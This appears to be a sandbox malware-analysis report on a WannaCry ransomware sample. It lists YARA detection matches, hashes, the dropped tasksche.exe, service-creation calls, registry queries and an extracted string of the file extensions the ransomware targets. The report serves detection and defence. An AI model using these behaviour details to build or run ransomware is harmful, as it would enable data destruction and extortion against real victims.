Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.onq54JS79W.exe.23d6948.6.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.2.onq54JS79W.exe.23c78c8.7.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1ea5084.5.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.2.onq54JS79W.exe.7100a4.1.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1ed7128.2.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 0.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware_Gen date = 2017-05-12, hash3 = 4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359, hash2 = 8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df, hash1 = 9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05, author = Florian Roth (Nextron Systems) (based on rule by US CERT), description = Detects WannaCry Ransomware, reference = https://www.us-cert.gov/ncas/alerts/TA17-132A
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.onq54JS79W.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23d28e8.9.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.0.onq54JS79W.exe.7100a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 1.2.onq54JS79W.exe.1eb4104.3.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1eb4104.3.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.23d6948.6.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.23d6948.6.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE	Matched rule: SUSP_Imphash_Mar23_2 date = 2023-03-23, author = Arnim Rupp (https://github.com/ruppde), description = Detects imphash often found in malware samples (Zero hits with with search for \'imphash:x p:0\' on Virustotal), score = 12bf2795f4a140adbaa0af6ad4b2508d398d8ba69e9dadb155f800b10f7458c4, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License, hash = 5b9348c24ff604e78d70464654e645b90dc695c7e0415959c443fe29cebc3c4e
Source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: 1.2.onq54JS79W.exe.1eb00a4.4.unpack, type: UNPACKEDPE	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000002.00000000.316611005.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000002.00000002.318070936.000000000040E000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.579812599.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000000.314619123.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000000.313403334.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000000.00000002.319235199.0000000000710000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.580942218.00000000023D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: 00000001.00000002.580444356.0000000001EB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (Nextron Systems) (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
Source: C:\Windows\tasksche.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware

Source: C:\Users\user\Desktop\onq54JS79W.exe

File created: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Windows\tasksche.exe	Code function: 2_2_00406C40	2_2_00406C40
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402A76	2_2_00402A76
Source: C:\Windows\tasksche.exe	Code function: 2_2_00402E7E	2_2_00402E7E
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040350F	2_2_0040350F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00404C19	2_2_00404C19
Source: C:\Windows\tasksche.exe	Code function: 2_2_0040541F	2_2_0040541F
Source: C:\Windows\tasksche.exe	Code function: 2_2_00403797	2_2_00403797
Source: C:\Windows\tasksche.exe	Code function: 2_2_004043B7	2_2_004043B7
Source: C:\Windows\tasksche.exe	Code function: 2_2_004031BC	2_2_004031BC

Source: Joe Sandbox View

Dropped File: C:\Windows\tasksche.exe 2584E1521065E45EC3C17767C065429038FC6291C091097EA8B22C8A502C41DD

Source: onq54JS79W.exe	Static PE information: Resource name: R type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: tasksche.exe.0.dr	Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract, compression method=deflate

Source: onq54JS79W.exe	ReversingLabs: Detection: 97%
Source: onq54JS79W.exe	Virustotal: Detection: 91%

Source: C:\Users\user\Desktop\onq54JS79W.exe

File read: C:\Users\user\Desktop\onq54JS79W.exe

Jump to behavior

Source: C:\Users\user\Desktop\onq54JS79W.exe	Code function: 0_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		0_2_00408090
Source: C:\Users\user\Desktop\onq54JS79W.exe	Code function: 1_2_00408090 GetModuleFileNameA,__p___argc,OpenSCManagerA,InternetCloseHandle,OpenServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherA,		1_2_00408090

Source: C:\Users\user\Desktop\onq54JS79W.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\onq54JS79W.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: unknown	Process created: C:\Users\user\Desktop\onq54JS79W.exe C:\Users\user\Desktop\onq54JS79W.exe
Source: unknown	Process created: C:\Users\user\Desktop\onq54JS79W.exe C:\Users\user\Desktop\onq54JS79W.exe -m security
Source: C:\Users\user\Desktop\onq54JS79W.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i
Source: C:\Users\user\Desktop\onq54JS79W.exe	Process created: C:\Windows\tasksche.exe C:\WINDOWS\tasksche.exe /i	Jump to behavior

Source: C:\Users\user\Desktop\onq54JS79W.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\onq54JS79W.exe

Code function: 0_2_00407CE0 InternetCloseHandle,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,FindResourceA,LoadResource,LockResource,SizeofResource,sprintf,sprintf,sprintf,MoveFileExA,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,CloseHandle,CloseHandle,

0_2_00407CE0

Source: tasksche.exe, 00000002.00000000.316611005.000000000040E000.00000008.00000001.01000000.00000005.sdmp, onq54JS79W.exe, tasksche.exe.0.dr

Binary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll

Source: classification engine

Classification label: mal100.rans.expl.evad.winEXE@4/1@0/100

Source: C:\Users\user\Desktop\onq54JS79W.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	0_2_00407C40
Source: C:\Users\user\Desktop\onq54JS79W.exe	Code function: sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,	1_2_00407C40
Source: C:\Windows\tasksche.exe	Code function: OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,sprintf,CreateServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,	2_2_00401CE8

Source: onq54JS79W.exe

Static file information: File size 3751936 > 1048576

Source: onq54JS79W.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x362000

Source: C:\Windows\tasksche.exe	Code function: 2_2_00407710 push eax; ret		2_2_0040773E
Source: C:\Windows\tasksche.exe	Code function: 2_2_004076C8 push eax; ret		2_2_004076E6

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\onq54JS79W.exe

Executable created and started: C:\WINDOWS\tasksche.exe

Jump to behavior

Source: C:\Users\user\Desktop\onq54JS79W.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\onq54JS79W.exe

File created: C:\Windows\tasksche.exe

Jump to dropped file

Source: C:\Users\user\Desktop\onq54JS79W.exe

Code function: 0_2_00407C40 sprintf,OpenSCManagerA,InternetCloseHandle,CreateServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,

0_2_00407C40

Source: C:\Users\user\Desktop\onq54JS79W.exe TID: 6596	Thread sleep count: 95 > 30			Jump to behavior
Source: C:\Users\user\Desktop\onq54JS79W.exe TID: 6660	Thread sleep count: 127 > 30			Jump to behavior

Source: onq54JS79W.exe, 00000000.00000002.319894146.0000000000ADF000.00000004.00000020.00020000.00000000.sdmp, onq54JS79W.exe, 00000001.00000002.580286950.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\tasksche.exe

Code function: 2_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00401A45

Source: C:\Windows\tasksche.exe

Code function: 2_2_004029CC free,GetProcessHeap,HeapFree,

2_2_004029CC

Source: C:\Users\user\Desktop\onq54JS79W.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

